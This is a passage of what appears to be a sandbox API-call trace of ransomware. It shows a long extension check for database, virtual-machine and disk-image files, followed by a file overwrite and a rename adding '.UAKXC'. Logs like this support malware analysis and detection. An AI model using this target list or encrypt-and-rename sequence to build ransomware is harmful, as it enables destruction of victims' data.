StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.818] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.819] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.820] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.821] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.825] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.826] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.827] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.828] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.829] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.829] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.829] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.829] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.829] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.829] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.829] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.830] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.830] SetEndOfFile (hFile=0x6c8) returned 1 [0140.830] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.830] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x17c, lpOverlapped=0x0) returned 1 [0140.830] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.830] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x17c, lpOverlapped=0x0) returned 1 [0140.830] CloseHandle (hObject=0x6c8) returned 1 [0140.835] GetProcessHeap () returned 0xea0000 [0140.835] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.835] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" [0140.835] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.UAKXC" [0140.835] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn"), 